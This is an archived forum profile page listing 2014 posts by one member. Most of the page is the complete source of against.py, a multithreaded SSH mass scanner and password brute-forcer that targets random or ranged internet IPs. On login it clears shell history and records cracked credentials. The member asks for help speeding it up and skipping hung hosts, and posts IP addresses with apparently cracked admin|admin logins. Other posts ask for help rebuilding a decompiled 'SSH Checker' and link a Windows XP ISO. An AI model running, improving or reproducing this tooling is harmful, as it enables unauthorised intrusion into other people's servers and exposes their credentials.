This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - qespresso

Pages: [1]
1
Reverse Engineering / Errors appears after using .net reflector then compile again using Visual studio
« on: June 22, 2014, 07:56:26 PM »
Hi mates :),
I tried to modified some parameter in one software that using C# .net4 m so I decided to use .net reflector to decompile it. No errors during decompiling using .net reflector.
After I get the sourcecode I tried to build again but errors appear.
With my low exp in reverse engineering I would like to ask if you can help me solve this problem.
The following is the software I tried to decomplie (attached in this post)
And this is errors appears
Code: (C) [Select]
Error 2 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 614 22 Lazy SSH - Checker-kai
Error 5 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 32 Lazy SSH - Checker-kai
Error 7 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 634 89 Lazy SSH - Checker-kai
Error 10 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 34 Lazy SSH - Checker-kai
Error 12 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 650 91 Lazy SSH - Checker-kai
Error 14 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 658 89 Lazy SSH - Checker-kai
Error 16 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 670 22 Lazy SSH - Checker-kai
Error 18 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 687 89 Lazy SSH - Checker-kai
Error 20 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 22 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 24 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 26 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 28 Unexpected character '\u003E' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 1 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 614 16 Lazy SSH - Checker-kai
Error 4 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 26 Lazy SSH - Checker-kai
Error 6 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 634 72 Lazy SSH - Checker-kai
Error 9 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 28 Lazy SSH - Checker-kai
Error 11 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 650 74 Lazy SSH - Checker-kai
Error 13 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 658 72 Lazy SSH - Checker-kai
Error 15 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 670 16 Lazy SSH - Checker-kai
Error 17 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 687 72 Lazy SSH - Checker-kai
Error 19 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 21 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 23 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 25 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 27 Unexpected character '\u003C' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 3 Unexpected character '\u0024' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 627 20 Lazy SSH - Checker-kai
Error 8 Unexpected character '\u0024' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\Form1.cs 643 22 Lazy SSH - Checker-kai
Error 97 The type name 'Class7' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 142 16 Lazy SSH - Checker-kai
Error 98 The type name 'Class7' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 142 45 Lazy SSH - Checker-kai
Error 75 The type name 'Class6' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 64 16 Lazy SSH - Checker-kai
Error 76 The type name 'Class6' does not exist in the type 'Lazy_SSH___Checker.CheckSSH' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 64 45 Lazy SSH - Checker-kai
Error 102 The name 'b__8' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 95 The name 'b__2' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 90 The name 'b__1' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 85 The name 'b__0' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 81 The name '__this' does not exist in the current context E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 27 Lazy SSH - Checker-kai
Error 77 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 7 Lazy SSH - Checker-kai
Error 78 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 13 Lazy SSH - Checker-kai
Error 79 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 80 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 26 Lazy SSH - Checker-kai
Error 82 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 62 Lazy SSH - Checker-kai
Error 83 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 69 Lazy SSH - Checker-kai
Error 84 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 86 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 87 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 68 Lazy SSH - Checker-kai
Error 88 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 75 Lazy SSH - Checker-kai
Error 89 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 91 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 92 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 68 Lazy SSH - Checker-kai
Error 93 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 75 Lazy SSH - Checker-kai
Error 94 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 96 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 99 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 62 Lazy SSH - Checker-kai
Error 100 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 69 Lazy SSH - Checker-kai
Error 101 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 103 Only assignment, call, increment, decrement, await, and new object expressions can be used as a statement E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 41 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 43 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 88 Lazy SSH - Checker-kai
Error 51 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 53 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 94 Lazy SSH - Checker-kai
Error 61 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 63 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 94 Lazy SSH - Checker-kai
Error 71 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 73 Invalid expression term ')' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 88 Lazy SSH - Checker-kai
Error 29 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 31 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 35 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 38 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 45 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 48 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 55 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 58 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 65 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 68 Invalid expression term '' E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 30 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 14 Lazy SSH - Checker-kai
Error 36 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 63 Lazy SSH - Checker-kai
Error 46 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 69 Lazy SSH - Checker-kai
Error 56 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 69 Lazy SSH - Checker-kai
Error 66 Identifier expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 63 Lazy SSH - Checker-kai
Error 32 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 20 Lazy SSH - Checker-kai
Error 33 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 26 Lazy SSH - Checker-kai
Error 34 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 70 27 Lazy SSH - Checker-kai
Error 37 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 69 Lazy SSH - Checker-kai
Error 39 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 77 Lazy SSH - Checker-kai
Error 40 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 83 Lazy SSH - Checker-kai
Error 42 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 87 Lazy SSH - Checker-kai
Error 44 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 85 88 Lazy SSH - Checker-kai
Error 47 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 75 Lazy SSH - Checker-kai
Error 49 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 83 Lazy SSH - Checker-kai
Error 50 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 89 Lazy SSH - Checker-kai
Error 52 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 93 Lazy SSH - Checker-kai
Error 54 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 109 94 Lazy SSH - Checker-kai
Error 57 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 75 Lazy SSH - Checker-kai
Error 59 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 83 Lazy SSH - Checker-kai
Error 60 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 89 Lazy SSH - Checker-kai
Error 62 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 93 Lazy SSH - Checker-kai
Error 64 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 113 94 Lazy SSH - Checker-kai
Error 67 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 69 Lazy SSH - Checker-kai
Error 69 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 77 Lazy SSH - Checker-kai
Error 70 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 83 Lazy SSH - Checker-kai
Error 72 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 87 Lazy SSH - Checker-kai
Error 74 ; expected E:\Softwares\Shared\sshchecker\dkm\Lazy SSH - Checker-kai\CheckSSH.cs 165 88 Lazy SSH - Checker-kai

2
Scripting Languages / Re: [Python] Need help in improvement of scanner code
« on: June 17, 2014, 05:23:01 AM »
Hi again in this topic,
Even paramiko support the timeout in connect() function - that's of course used in the script of our topic
Code: (python) [Select]
      ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
But when i tried to execute it, it hangs badly even I set "timeout" parameter already ; especially when the script detect a host with the response code like this
Code: (python) [Select]
74.42.179.47|admin|admin  > session terminated due to idle timeout (600 seconds)                                                                               
184.12.232.241|admin|admin  > session terminated due to idle timeout (600 seconds)                                                                             
200.105.185.201|admin|admin  > session terminated due to idle timeout (600 seconds)   
Could anyone give me a suggestion how to skip these hosts?(since "timeout"  doesn't work)

3
Hacking and Security / Re: Windows XP
« on: June 10, 2014, 04:55:22 AM »
I have no idea about cookie in our forum but I have some good and fast link for you (from original source of msdn)

en_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-73974.iso
https://docs.google.com/file/d/0B8Q57M1j2bO7MHFGd29YbGE1bGM/edit?pli=1

The same iso file but on another file hosting(6 parts)
https://onedrive.live.com/?cid=B9F475D15345B40D&id=B9F475D15345B40D%21246

4
Scripting Languages / Re: [Python] Need help in improvement of scanner code
« on: June 09, 2014, 09:40:33 AM »
The program loops all the user and all the password from the txt file
Code: [Select]
        for user in users:
            for password in passwords:
I need just to check some user|pass login pair like:
Code: [Select]
admin|admin
test|test
ubnt|ubnt

P/S I already found the solution recently. I tried to use split() function and it works like a charm. Thank you very much for you attention to my topic :)


5
Scripting Languages / [Python] Need help in improvement of scanner code
« on: June 09, 2014, 03:56:53 AM »
To whom it may concern,
I'm seeking for some sh brute force script running in linux. From many source on internet I found there're some solutions for that like THC hydra, medusa or ncrack. But these software have some problem with its performance since they have many features for many services.
I tried SSHtrix from http://noptrix.net/codes.html , it works well but still .. slow.
The one that fit my need was againts.py from http://nullsecurity.net/tools/cracker.html
Here is the code of this cool script
Code: (python) [Select]
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# against.py - mass scanning and brute-forcing script for ssh                  #
#                                                                              #
# FILE                                                                         #
# against.py                                                                   #
#                                                                              #
# DATE                                                                         #
# 2014-02-27                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# 'against.py' is a very fast ssh attacking script which includes a            #
# multithreaded port scanning module (tcp connect) for discovering possible    #
# targets and a multithreaded brute-forcing module which attacks               #
# parallel all discovered hosts or given ip addresses from a list.             #
#                                                                              #
# AUTHOR                                                                       #
# pgt - http://www.nullsecurity.net/                                           #
#                                                                              #
# TODO                                                                         #
# - keyboard-interactive handler                                               #
# - scan ip address ranges randomly                                            #
#                                                                              #
# CHANGELOG                                                                    #
# v0.2                                                                         #
# - prints kernel version after login                                          #
# - optimized timings when cracking                                            #
# - detection for key authentication                                           #
# - false positive / small honeypot detection                                  #
# - save found target ip addresses to file, -O option                          #
# - 127.x.x.x will be excluded when scanning for random ip addresses           #
# - unsort found target ip addresses, because of sequential port scanning      #
# - resolve ip address by given hostname                                       #
# - stop attacks on target when keyboard-interactive is required               #
# - set threads for port scanning, -s option                                   #
#                                                                              #
################################################################################


from socket import *
import multiprocessing
import threading
import time
import paramiko
import sys
import os
import logging
import argparse
import random
import re


# version of against.py
VERSION = 'v0.2'


# print our nice banner ;)
def banner():
    print '--==[ against.py by pgt@nullsecurity.net ]==--'

# print version
def version():
    print '[+] against.py %s' % (VERSION)
    sys.exit(0)

# check if we can write to file
def test_file(filename):
    try:
        outfile = open(filename, 'a')
        outfile.close()
    except IOError:
        print '[!] ERROR: cannot write to file \'%s\'' % filename
        sys.exit(1)

# define command line parameters and help page
def argspage():
    parser = argparse.ArgumentParser(
    usage = '\n\n   ./%(prog)s -i <arg> | -r <arg> | -I <arg>',
    formatter_class = argparse.RawDescriptionHelpFormatter,
    epilog =
    'examples:\n\n'

    '  attack single target\n'
    '  usage: ./%(prog)s -i nsa.gov -L passwords.txt\n\n'

    '  scanning and attacking an ip-range\n'
    '  usage: ./%(prog)s -i 192.168.0-10.1-254 -u admin -l troll -s 500',
    add_help = False
    )

    options = parser.add_argument_group('options', '')
    options.add_argument('-i', default=False, metavar='<ip/range>',
            help='ip address/ip range/domain (e.g.: 192.168.0-3.1-254)')
    options.add_argument('-I', default=False, metavar='<file>',
            help='list of targets')
    options.add_argument('-r', default=False, metavar='<num>',
            help='attack random hosts')
    options.add_argument('-p', default=22, metavar='<num>',
            help='port number of sshd (default: 22)')
    options.add_argument('-t', default=4, metavar='<num>',
            help='threads per host (default: 4)')
    options.add_argument('-f', default=8, metavar='<num>',
            help='attack max hosts parallel (default: 8)')
    options.add_argument('-u', default='root', metavar='<username>',
            help='single username (default: root)')
    options.add_argument('-U', default=False, metavar='<file>',
            help='list of usernames')
    options.add_argument('-l', default='toor', metavar='<password>',
            help='single password (default: toor)')
    options.add_argument('-L', default=False, metavar='<file>',
            help='list of passwords')
    options.add_argument('-o', default=False, metavar='<file>',
            help='write found logins to file')
    options.add_argument('-O', default=False, metavar='<file>',
            help='write found target ip addresses to file')
    options.add_argument('-s', default=200, metavar='<num>',
            help='threads when port scanning (default: 200)')
    options.add_argument('-T', default=3, metavar='<sec>',
            help='timeout in seconds (default: 3)')
    options.add_argument('-V', action='store_true',
            help='print version of against.py and exit')

    args = parser.parse_args()

    if args.V:
        version()

    if (args.i == False) and (args.I == False) and (args.r == False):
        print ''
        parser.print_help()
        sys.exit(0)

    return args

# write found ip addresses / logins to file
def write_to_file(filename, text):
    outfile = open(filename, 'a')
    outfile.write(text)
    outfile.close()

# connect to target and checks for an open port
def scan(target, port, timeout, oips):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(timeout)
    result = sock.connect_ex((target, port))
    sock.close()
    if result == 0:
        HOSTLIST.append(target)
        if oips:
            write_to_file(oips, target + '\n')

# control the maximum number of threads
def active_threads(threads, waittime):
    while threading.activeCount() > threads:
        time.sleep(waittime)

# create thread and call scan()
def thread_scan(args, target):
    port = int(args.p)
    timeout = float(args.T)
    oips = args.O
    threads = int(args.s)

    bam = threading.Thread(target=scan, args=(target, port, timeout, oips))
    bam.start()

    active_threads(threads, 0.0001)
    time.sleep(0.001)

# only the output when scanning for targets
def scan_output(i):
    sys.stdout.flush()
    sys.stdout.write('\r[*] hosts scanned: {0} | ' \
            'possible to attack: {1}'.format(i, len(HOSTLIST)))

# handle format of given target(s)
def check_targets(targets):
    if re.match(r'^[0-9.\-]*$', targets):
        return targets
    try:
        target = gethostbyname(targets)
        return target
    except gaierror:
        print '[-] \'%s\' is unreachable' % (targets)
        finished()
        sys.exit(1)

# unsort found hosts, because of incremental scanning
def unsort_hostlist():
    print '[*] unsort host list'
    for i in range(15):
        random.shuffle(HOSTLIST)

# handle ip range format from command line
def handle_ip_range(iprange):
    parted = tuple(part for part in iprange.split('.'))

    rsa = range(4)
    rsb = range(4)
    for i in range(4):
        hyphen = parted[i].find('-')
        if hyphen != -1:
            rsa[i] = int(parted[i][:hyphen])
            rsb[i] = int(parted[i][1+hyphen:]) + 1
        else:
            rsa[i] = int(parted[i])
            rsb[i] = int(parted[i]) + 1

    return (rsa, rsb)

# call thread_scan() with target ip addresses
def ip_range(args):
    targets = check_targets(args.i)
    rsa, rsb = handle_ip_range(targets)

    print '[*] scanning %s for ssh services' % targets
    counter = 0
    for i in range(rsa[0], rsb[0]):
        for j in range(rsa[1], rsb[1]):
            for k in range(rsa[2], rsb[2]):
                for l in range(rsa[3], rsb[3]):
                    target = '%d.%d.%d.%d' % (i, j, k, l)
                    counter += 1
                    scan_output(counter)
                    thread_scan(args, target)

    # waiting for the last running threads
    active_threads(1, 0.1)

    scan_output(counter)
    print '\n[*] finished scan'

# create ip addresses
def randip():
    rand = range(4)
    for i in range(4):
        rand[i] = random.randrange(0, 256)

    # exclude 127.x.x.x
    if rand[0] == 127:
        randip()

    ipadd = '%d.%d.%d.%d' % (rand[0], rand[1], rand[2], rand[3])
    return ipadd

# create random ip addresses
def rand_ip(args):
    i = 0
    print '[*] scanning random ips for ssh services'
    while len(HOSTLIST) < int(args.r):
        i += 1
        scan_output(i)
        thread_scan(args, randip())

    # waiting for the last running threads
    active_threads(1, 1)

    scan_output(i)
    print '\n[*] finished scan.'

# checks if given filename by parameter exists
def file_exists(filename):
    try:
        open(filename).readlines()
    except IOError:
        print '[!] ERROR: cannot open file \'%s\'' % filename
        sys.exit(1)

# read-in a file with ip addresses
def ip_list(ipfile):
    file_exists(ipfile)
    targets = open(ipfile).readlines()
    for target in targets:
        HOSTLIST.append(target)

# connect to target and try to login
def crack(target, port, user, passwd, outfile, timeo, i):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    user = user.replace('\n', '')
    passwd = passwd.replace('\n', '')
    try:
        ssh.connect(target, port=port, username=user, password=passwd,
                timeout=timeo, pkey=None, allow_agent=False)
        time.sleep(3)
        try:
            ssh.exec_command('unset HISTFILE ; unset HISTSIZE')
            time.sleep(1)
            ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command('uname -a ' \
                    '|| cat /proc/version')
            output = 'kernel: %s' \
                    % (ssh_stdout.readlines()[0].replace('\n', ''))
        except:
            output = 'info: maybe a honeypot or false positive'
        login = '[+] login found for %s | %s:%s\n' \
                '[!] %s' % (target, user, passwd, output)
        print login
        if outfile:
            write_to_file(outfile, login + '\n')
        ssh.close()
        os._exit(0)
    except paramiko.AuthenticationException, e:
        ssh.close()
        exception = str(e)
        if '[\'publickey\']' in exception:
            print '[-] key authentication only - ' \
                'stopped attack against %s' % (target)
            os._exit(1)
        elif '\'keyboard-interactive\'' in exception:
            print '[-] %s requires \'keyboard-interactive\' handler' % (target)
            os._exit(1)
    except:
        ssh.close()
        # after 3 timeouts per request the attack against $target will stopped
        if i < 3:
            i += 1
            # reconnect after random seconds (between 0.6 and 1.2 sec)
            randtime = random.uniform(0.6, 1.2)
            time.sleep(randtime)
            crack(target, port, user, passwd, outfile, timeo, i)
        else:
            print '[-] too many timeouts - stopped attack against %s' % (target)
            os._exit(1)

# create 'x' number of threads and call crack()
def thread_it(target, args):
    port = int(args.p)
    user = args.u
    userlist = args.U
    password = args.l
    passlist = args.L
    outfile = args.o
    timeout = float(args.T)
    threads = int(args.t)

    if userlist:
        users = open(userlist).readlines()
    else:
        users = [user]
    if passlist:
        passwords = open(passlist).readlines()
    else:
        passwords = [password]

    # try/except looks dirty but we need it :/
    try:
        for user in users:
            for password in passwords:
                Run = threading.Thread(target=crack, args=(target, port, user,
                    password, outfile, timeout, 0,))
                Run.start()
                # checks that we a max number of threads
                active_threads(threads, 0.01)
                time.sleep(0.1)
        # waiting for the last running threads
        active_threads(1, 1)
    except KeyboardInterrupt:
        os._exit(1)

# create 'x' child processes (child == cracking routine for only one target)
def fork_it(args):
    threads = int(args.t)
    childs = int(args.f)
    len_hosts = len(HOSTLIST)

    print '[*] attacking %d target(s)\n' \
            '[*] cracking up to %d hosts parallel\n' \
            '[*] threads per host: %d' % (len_hosts, childs, threads)

    i = 1
    for host in HOSTLIST:
        host = host.replace('\n', '')
        print '[*] performing attacks against %s [%d/%d]' % (host, i, len_hosts)
        hostfork = multiprocessing.Process(target=thread_it, args=(host, args))
        hostfork.start()
        # checks that we have a max number of childs
        while len(multiprocessing.active_children()) >= childs:
            time.sleep(0.001)
        time.sleep(0.001)
        i += 1

    # waiting for child processes
    while multiprocessing.active_children():
        time.sleep(1)

# \(0.o)/
def empty_hostlist():
    if len(HOSTLIST) == 0:
        print '[-] found no targets to attack!'
        finished()
        sys.exit(1)

